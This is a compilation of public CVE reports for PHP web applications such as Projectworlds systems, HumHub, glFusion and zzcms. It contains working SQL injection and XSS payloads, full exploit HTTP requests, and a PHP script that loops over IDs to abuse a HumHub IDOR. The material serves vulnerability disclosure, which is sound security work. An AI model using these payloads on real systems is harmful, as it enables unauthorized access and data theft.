Projectworlds Hospital Management System v1.0 is vulnerable to SQL injection via the email parameter in hms-staff.php.

    ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND 'a'='a
    

    POST /hms-staff.php HTTP/1.1
    Host: 127.0.0.1:8888
    Content-Length: 120
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1:8888
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://127.0.0.1:8888/hms-staff.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=ghpdj0nh826f31malqm7j3dko7
    Connection: close
    
    email=admin@example.com'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)%20AND%20'a'%3d'a&password=password&type=admin
    

Validate input of `email` parameter in `hms-staff.php`.

CVE-2021-43628: SQL Injection vulnerability via the "email" parameter in hms-staff.php · Issue #2 · projectworldsofficial/hospital-management-system-in-php

Projectsworlds Online Shopping System PHP 1.0 is vulnerable to SQL injection via the id parameter in cart_remove.php.

**Author**

KhanhCM (@khanhchauminh)

**Version: 1.0****No login is required**

*   Example payload:

    ' or updatexml(1,concat(0x7e,(version())),0) -- a
    

**Proof-of-concept**

    http://127.0.0.1:8888/cart_remove.php?id=5%27%20or%20updatexml%281%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20--%20a
    

**HTTP request**

    GET /cart_remove.php?id=5%27%20or%20updatexml%281%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20--%20a HTTP/1.1
    Host: 127.0.0.1:8888
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://127.0.0.1:8888/cart.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    
    

**Response in Burpsuite**

![image](https://user-images.githubusercontent.com/48460056/139582804-7572a9b2-5e2c-43ae-a465-4921e7fe5068.png)

**Source code review****cart\_remove.php**

![image](https://user-images.githubusercontent.com/48460056/140705118-65f5863f-8065-4ecc-99e8-b99a1bc4b37c.png)

**Remediation**

Validate input of `id` parameter in `cart_remove.php`.

CVE-2021-43157: SQL Injection vulnerability via the "id" parameter in cart_remove.php · Issue #1 · projectworldsofficial/online-shopping-webvsite-in-php

Projectsworlds Online Book Store PHP v1.0 is vulnerable to SQL injection via the "bookisbn" parameter in cart.php.

**Author**

KhanhCM (@khanhchauminh)

**Version: 1.0****Steps to reproduce**

1.  Go to any book detail page by clicking on that book's image.
2.  Click on "**Purchase / Add to cart**" button.
3.  Intercept the request and insert the payload in the value of the `bookisbn` parameter.

Example payload:

    ' or updatexml(1,concat(0x7e,(version())),0) -- a
    

**Proof-of-concept**

    POST /cart.php HTTP/1.1
    Host: 127.0.0.1:8888
    Content-Length: 137
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.89.145:8888
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://127.0.0.1:8888/book.php?bookisbn=978-1-49192-706-9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=2vmimaak7ho1ccnj624a5js0lq
    Connection: close
    
    bookisbn=978-1-49192-706-9%27%20or%20updatexml%281%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20--%20a&cart=Purchase+%2F+Add+to+cart
    

**Response in Burpsuite**

![image](https://user-images.githubusercontent.com/48460056/139533129-7f51c4b6-7f26-42ef-b6a6-8b3e87288996.png)

**Source code review****cart.php**

![image](https://user-images.githubusercontent.com/48460056/140685540-6bc5dd66-c82e-4a5c-84b3-7e520a6cc238.png)

**functions/cart\_functions.php**

![image](https://user-images.githubusercontent.com/48460056/140685638-a94fd21c-63cd-4998-b497-d6691e4bbf7e.png)

**functions/database\_functions.php**

![image](https://user-images.githubusercontent.com/48460056/140685669-6c6e2a6c-436c-4f64-a7f0-90ec3dc80ddb.png)

**Remediation**

Validate input of `bookisbn` parameter in `cart.php`.

CVE-2021-43155: SQL Injection vulnerability via the "bookisbn" parameter in cart.php · Issue #18 · projectworldsofficial/online-book-store-project-in-php

HumHub is an open-source social network kit written in PHP. Prior to HumHub version 1.10.3 or 1.9.3, it could be possible for registered users to become unauthorized members of private Spaces. Versions 1.10.3 and 1.9.3 contain a patch for this issue.

**Description**

Hello guys, hope you are having an awesome day! 🤗

HumHub has a functionality for spaces where you define that only invited users will be able to join a space. Private spaces come with this option but you can also define it for public ones.

While a user is creating a space, this user is requested to invite people to the new space, and this specific inviting endpoint, which is

    https://example.com/space/create/invite?spaceId=ID_HERE
    

is vulnerable to an IDOR, which means that if you change the spaceId parameter to the ID of any other space, the invite will be sent to this different space, no matter if it's yours or not.

**Steps to Reproduce**

In order to reproduce it, I'm going to assume you are using Burp Suite, but any other proxy tool will work basically the same, or even the browsers' Dev Tools might suit our needs here.

1 => Having an instance of HumHub up and running, create one account (UserA) and then create some private spaces;

2 => Logout from the first account and create a second one (UserB). Going to the spaces page, you are going to see none of the previously created private spaces;

3 => Follow the normal steps of creating a new space, until you get to the step which asks you to invite people. Select a user but don't send anything yet;

4 => If you are using a proxy tool, turn on the mode which pauses/intercepts requests. If you are going to use just the browser, open the network tab of Dev Tools;

5 => Going back to the space creation steps, click on "done" and then look (in your proxy tool or dev tools) for a request pointing to /space/create/invite?spaceId=something

6 => From this request, you are going to need the data which is listed below. Store it elsewhere for a few moments.

    1. The spaceId presented on the URL. // e.g.: 5
    2. The X-CSRF-Token header // e.g.: X-CSRF-Token: RMO2UxPutPpAHzJ8G61RekAm6kisMFMoFyS8WYJxYOkbqdpqcbuFsBlXahN8niIXFxSiKchyG2VyU9RozgAGmw==
    3. Your cookies // e.g.: Cookie: PHPSESSID=gum62u217vegimktf07jmodtdh; _identity=c8f37b6923cfa5b5300e342549200705bf64e25dfb10c0a279fdf1c60ffa7d53a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A50%3A%22%5B4%2C%22fff5af-ff1a6f8f71f-sagsag51-fafsadff%22%2C2592000%5D%22%3B%7D; _csrf=7101b890dc816f2f27f40ef0cc5fccbcde83f09cabbf268052813684b289c452a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22_jl9bU1JYHXog3smW2HadBHMewh1Lqfr%22%3B%7D
    4. The request body //e.g.: _csrf=5DglQFCF-RYl3c2fUNGeG2Jk83ihD8qw8VJ1YO0SRmK7Ukl5MtDIXHyVlfA34u12NVa7GcVNgv2UJR1RoWMgEA%3D%3D&InviteForm%5Binvite%5D=&InviteForm%5Binvite%5D%5B%5D=04d7b10a-8a53-47fc-8cc2-70c0bc5a464f&InviteForm%5BinviteExternal%5D=
    

7 => Forward the requests if you are on a proxy tool. Now, from the request body, you will need to change the parameter InviteForm%5Binvite%5D%5B%5D (or InviteForm[invite][] if it's not url-encoded), from the originally invited user's guid to your own UserB guid. This can be found by opening a new tab and making a GET request to https://example.com/user/search/json?keyword=UserB_DISPLAY_NAME_HERE;

8 => Now create and run a .php file with the following PoC (don't forget to change the initial variables with the data you collected):

    <?php
    
    $spaceId = YOUR_SPACE_ID_NUMBER;
    $baseURL = "https://YOUR_HOST/";
    $requestBody = "YOUR_REQUEST_BODY";
    $x_csrf_token = "X-CSRF-Token: YOUR_SUPER_COOL_TOKEN_HERE";
    $cookies = "Cookie: YOUR_COOKIES";
    
    $ch = curl_init();
    
    // It goes from the last to the first space, in a way that the user get invited to
    // all the private spaces
    for( $i = $spaceId; $i >= 1; $i-- ) {
        curl_setopt($ch, CURLOPT_URL, $baseURL.'/space/create/invite?spaceId='.$i);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch,CURLOPT_POSTFIELDS, $requestBody);
        curl_setopt($ch,CURLOPT_HTTPHEADER,array(
            'X-Requested-With:XMLHttpRequest',
            $x_csrf_token,
            $cookies
        ));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, TRUE);
        curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17');
        curl_setopt($ch, CURLOPT_AUTOREFERER, true); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    
        $content = curl_exec($ch);
        
        if(curl_getinfo($ch,CURLINFO_HTTP_CODE) === 200) {
            echo "Invite received for ID = " . $i . " (if you are not already in)\n";
        }
    }
    
    ?>
    

9 => Once it's done, go back to the spaces page as UserB, and see that they got invited to every single private group that UserA created.

**Impact**

This issue compromises the confidentiality of private spaces, once any authenticated user can have access to all of them without the permission of the spaces' owners.

CVE-2021-43847: Authorization Bypass Through User-Controlled Key in humhub

glFusion CMS 1.7.9 is affected by an access control vulnerability via /public_html/users.php.

Incidentally, it's worth mentioning that the lockout is based on failed attempts from an IP address, not by user name. So the valid user could still log into the site. Unless they're sharing a public IP with the attacker, of course.

…

On Thu, Dec 9, 2021 at 9:43 AM Lee Garner \*\*\*@\*\*\*.\*\*\*> wrote: Currently the full name (could be a nickname) is shown along with the username. I don't think it would hurt to show only the fullname, if available, otherwise the user name. Creating a "nickname" field is interesting, but I suspect most users will leave it blank if allowed, or use their login names for it as well. On Thu, Dec 9, 2021 at 2:12 AM Topsec\_bunney \*\*\*@\*\*\*.\*\*\*> wrote: > We can get username on this link: > > http://192.168.255.130/glfusion1.7.9/public\_html/users.php?mode=profile&uid=3 > \[image: firefox\_fIwf2EDlUU\] > <https://user-images.githubusercontent.com/73220685/145376552-976aae00-0893-44b7-ac14-0c1e7de9233f.png\> > > So, attacker can get all username . > > Then they can always log in to all users with the wrong password, which > will prevent all users from logging in to the website normally. > > \[image: firefox\_LrrbnCvHFd\] > <https://user-images.githubusercontent.com/73220685/145376725-bde27dbe-c667-4ba4-8cf4-4b5f99998885.png\> > > There are two solutions: > > 1. > > set the verification code on the login page > 2. > > The second is to display the user's nickname instead of the login name > > — > You are receiving this because you are subscribed to this thread. > Reply to this email directly, view it on GitHub > <#487\>, or unsubscribe > <https://github.com/notifications/unsubscribe-auth/ABYLFOJM34JDJPZKT6FGA4TUQB6JPANCNFSM5JWB3F2Q\> > . > Triage notifications on the go with GitHub Mobile for iOS > <https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675\> > or Android > <https://play.google.com/store/apps/details?id=com.github.android&referrer=utm\_campaign%3Dnotification-email%26utm\_medium%3Demail%26utm\_source%3Dgithub\>. > >

CVE-2021-44949: glFusion CMS 1.7.9 user Login denied vulnerability · Issue #487 · glFusion/glfusion

glFusion CMS v1.7.9 is affected by an arbitrary user registration vulnerability in /public_html/users.php. An attacker can register with the mailbox of any user. When users want to register, they will find that the mailbox has been occupied.

That's true, but I'm not sure now much of a problem it is. If the malicious user uses a valid email address, the activation email will be sent to the real email account holder. If the submission queue is used, the email is sent upon approval. If the user submission is rejected, the record is deleted and available for re-registration. I suppose it wouldn't hurt to send an email to the new user even if queued, saying "your account is pending approval"

…

On Wed, Dec 8, 2021 at 10:18 PM Topsec\_bunney \*\*\*@\*\*\*.\*\*\*> wrote: \*\*There is a logical problem with the user registration page After clicking the register button, the user does not need to confirm the email. The system directly saves the submitted content in the database. This leads to a problem. An attacker can register with the mailbox of any user. When users want to register, they will find that the mailbox has been occupied.\*\* \[image: firefox\_0LibhucPYT\] <https://user-images.githubusercontent.com/73220685/145344346-91dbbce9-01c4-4fad-8a78-b070c9959766.png\> — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub <#485\>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ABYLFOKDJWVDPQVG2YPTBB3UQBCZ5ANCNFSM5JVTDREQ\> . Triage notifications on the go with GitHub Mobile for iOS <https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675\> or Android <https://play.google.com/store/apps/details?id=com.github.android&referrer=utm\_campaign%3Dnotification-email%26utm\_medium%3Demail%26utm\_source%3Dgithub\>.

CVE-2021-44937: glFusion CMS 1.7.9 Arbitrary user registration vulnerability · Issue #485 · glFusion/glfusion

Cross Site Scripting (XSS) vulnerability exists in zzcms 2019 XSS via a modify action in user/adv.php.

**/user/adv.php**

Edition: zzcms2019 /user/adv.php

**0x01 Vulnerability**

Get the `modify` parameter with the `request` method

    if ($action=="modify"){
        checkstr($img,"upload");//入库前查上传文件地址是否合格
        checkstr($oldimg,"upload");//入库前查上传文件地址是否合格
        query("update zzcms_textadv set adv='$adv',company='$company',advlink='$advlink',img='$img',passed=0 where username='".$_COOKIE["UserName"]."'");
    

Which is called vulnerable parameter `$img`

Enter the `checkstr($img,"upload");` function

    function checkstr($str,$kind,$msg='',$back_url='back'){
        if ($str<>''){
            switch ($kind){
            ...
            case "upload";//用于引用网络图片地址和视频地址的上传页
            	if (strpos("gif|jpg|peg|png|bmp|flv|swf",strtolower(substr($str,-3)))===false){
            	showmsg($msg.$str."不支持的上传文件格式。支持的文件格式为（gif|jpg|png|bmp|flv|swf）",$back_url);
            	}
            	if (substr($str,0,4)<>"http" && $str<>"/image/nopic.gif"){
            		if (strpos($str,'/uploadfiles')===false){
            		showmsg($msg.$str."不支持的上传文件地址",$back_url);
            		}
            	}
            break;	
            }
        }
    }
    

This function only judges the suffix name and the first four bits. So we can construct payload.

    http:' onerror=alert(1) alt='1.jpg
    

In this way, the detection of functions can be bypassed.

Although the global filter file is also loaded.`/inc/stopsqlin.php`

    function zc_check($string){
    	if(!is_array($string)){
    		if(get_magic_quotes_gpc()){
    	 	return htmlspecialchars(trim($string));
    		}else{
    		return addslashes(htmlspecialchars(trim($string)));
    		}
    	 }
    	foreach($string as $k => $v) $string[$k] = zc_check($v);
    	return $string;
    }
    	
    if($_REQUEST){
    	$_POST =zc_check($_POST);
    	$_GET =zc_check($_GET);
    	$_COOKIE =zc_check($_COOKIE);
    	@extract($_POST);
    	@extract($_GET);	
    }
    

`htmlspecialchars` function does not escape single quotes by default.

So you can't defend against single quotation closure.

The complete package is as follows.

    POST /user/adv.php?action=modify HTTP/1.1
    Host: www.testzzcms.com
    Content-Length: 200
    Cache-Control: max-age=0
    Origin: http://www.testzzcms.com
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://www.testzzcms.com/user/adv.php
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; bdshare_firstime=1555068916100; PHPSESSID=70imo2hba2vg0b12n65rngv277; UserName=testxss; PassWord=19a811d71d1df1dd8ef14374949b4409; __tins__713776=%7B%22sid%22%3A%201556018030370%2C%20%22vd%22%3A%205%2C%20%22expires%22%3A%201556019863811%7D; __51cke__=; __51laig__=10
    Connection: close
    
    adv=%E6%B5%8B%E8%AF%95&advlink=%2Fzt%2Fshow-1.htm&company=%E6%B5%8B%E8%AF%95&oldimg=%2Fuploadfiles%2F2019-04%2F20190423195439950.jpg&img=http:1' onerror=alert(/xss/) alt='1.jpg&Submit22=%E4%BF%AE%E6%94%B9
    

When Administrators Access Advertisements -->Advertisements Users Apply for

![](https://github.com/zzb1999/CVE/raw/master/zzcms/image/xss001.png)

He/She will be see a alert window which said /xss/

![](https://github.com/zzb1999/CVE/raw/master/zzcms/image/xss002.png)

![](https://github.com/zzb1999/CVE/raw/master/zzcms/image/xss003.jpg)

CVE-2020-19042: CVE/XSS.md at master · zzb1999/CVE

Missing SSL Certificate Validation issue exists in Pluck 4.7.15 in update_applet.php, which could lead to man-in-the-middle attacks.

**Issue Summary**  
Pluck's update system deliberately skips SSL certificate validation.

**Detailed Description**  
Within update\_applet.php is the following code:

    		// Dont check ssl certifical
    		curl_setopt($geturl, CURLOPT_SSL_VERIFYPEER, false);
    

This ensures peer SSL certificates are never valdiated.

**Impact**  
In theory, this vulnerability can make the Pluck's update system susceptible to Man-in-the-middle attacks.

CVE-2021-31747: Pluck 4.7.15 - Missing SSL Certificate Validation in update_applet.php · Issue #101 · pluck-cms/pluck

Due to insufficient server-side login-attempt limit enforcement, a vulnerability in /account/login in Huntflow Enterprise before 3.10.14 could allow an unauthenticated, remote user to perform multiple login attempts for brute-force password guessing.

CVE-2021-37934 ------------------------------------------ Insufficient server-side login-attempt limit ------------------------------------------ \[Suggested description\] Due to insufficient server-side login-attempt limit enforcement, a vulnerability in /account/login in Huntflow Enterprise before 3.10.14 could allow an unauthenticated, remote user to perform multiple login attempts for brute-force password guessing. ------------------------------------------ \[Additional Information\] Example login request to /account/login: POST /account/login HTTP/1.1 Host: hf.mydomain Connection: close Content-Length: 98 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: https://hf.mydomain Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: https://hf.mydomain/account/login Accept-Encoding: gzip, deflate Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: lang=ru\_RU; \_xsrf=2|b65eb986|309cc18c34ff994a04ca856397c5f300|1619468100; token=5kafeoqj6vk2tb3mmx31wyl8zvc1ti7mtfpkretj2k38qgdaddl5wl07yz0tjiwm; \_xsrf=2%7Cb65eb986%7C309cc18c34ff994a04ca856397c5f300%7C1619468100&email=user123&password=p@ssw0rd There is no any server-side login-attempt limit and attacker can perform multiple login attempts for brute-force password guessing. ------------------------------------------ \[VulnerabilityType Other\] CWE-307: Improper Restriction of Excessive Authentication Attempts ------------------------------------------ \[Vendor of Product\] Huntflow ------------------------------------------ \[Affected Product Code Base\] Huntflow Enterprise - Affected < 3.10.14. Fixed at 3.10.14. Tested at 3.6.1 ------------------------------------------ \[Affected Component\] "/account/login" HTTP method ------------------------------------------ \[Attack Type\] Remote - unauthenticated users ------------------------------------------ \[CVE Impact\] Brute-force password attacks ------------------------------------------ \[Attack Vectors\] To exploit send multiple login attempts to the Huntflow Enterprise "/account/login" HTTP method ------------------------------------------ \[Reference\] https://huntflow.ru https://gist.github.com/andrey-lomtev/4ec9004101152ea9d0043a09d59498a6 ------------------------------------------ \[Has vendor confirmed or acknowledged the vulnerability?\] true ------------------------------------------ \[Discoverer\] Andrey Lomtev ------------------------------------------ Andrey Lomtev / Infosec.ru team

CVE-2021-37934: CVE-2021-37934

OpUtils in Zoho ManageEngine OpManager 12.5 before 125490 mishandles authentication for a few audit directories.

Tag

#apple